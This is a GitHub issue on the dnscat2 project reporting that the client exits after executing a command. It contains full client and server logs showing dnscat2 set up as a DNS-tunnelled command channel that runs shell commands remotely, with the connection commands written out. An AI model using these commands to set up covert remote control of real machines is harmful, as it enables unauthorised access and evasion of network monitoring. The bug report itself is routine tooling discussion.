iagox86 / dnscat2

BSD 3-Clause "New" or "Revised" License

client exits on exec #117

Open truekonrads opened 6 years ago

truekonrads commented 6 years ago

If an exec command is given to the client, the client executes it and then exits, for example:

$ ./dnscat --dns domain=dnscat2.smelkovs.com --secret acme
Creating DNS driver:
 domain = dnscat2.smelkovs.com
 host   = 0.0.0.0
 port   = 53
 type   = TXT,CNAME,MX
 server = 8.8.8.8

** Peer verified with pre-shared secret!

Session established!
Got a command: COMMAND_EXEC [request] :: request_id: 0x0001 :: name: id :: command: id
[[ WARNING ]] :: Starting: /bin/sh -c 'id'
[[ WARNING ]] :: Started: id (pid: 21779)
Response: COMMAND_EXEC [response] :: request_id: 0x0001 :: session_id: 0xdf29

** Peer verified with pre-shared secret!

Session established!
konrads@dickens:~/dnscat2/

And server:

r$ sudo ruby ./dnscat2.rb -e open dnscat2.smelkovs.com --secret acme -a 'exec id'

New window created: 0
New window created: crypto-debug
Welcome to dnscat2! Some documentation may be out of date.

auto_attach => false
auto_command => exec id
history_size (for new windows) => 1000
Security policy changed: Client can decide on security level
New window created: dns1
Starting Dnscat2 DNS server on 0.0.0.0:53
[domains = dnscat2.smelkovs.com]...

Assuming you have an authoritative DNS server, you can run
the client anywhere with the following (--secret is optional):

  ./dnscat --secret=acme dnscat2.smelkovs.com

To talk directly to the server without a domain name, run:

  ./dnscat --dns server=x.x.x.x,port=53 --secret=acme

Of course, you have to figure out <server> yourself! Clients
will connect directly on UDP port 53.

dnscat2> New window created: 1
Session 1 Security: ENCRYPTED AND VERIFIED!
(the security depends on the strength of your pre-shared secret!)
New window created: 2
Session 2 Security: ENCRYPTED AND VERIFIED!
(the security depends on the strength of your pre-shared secret!)

dnscat2>

Lz1y commented 4 years ago

Same here.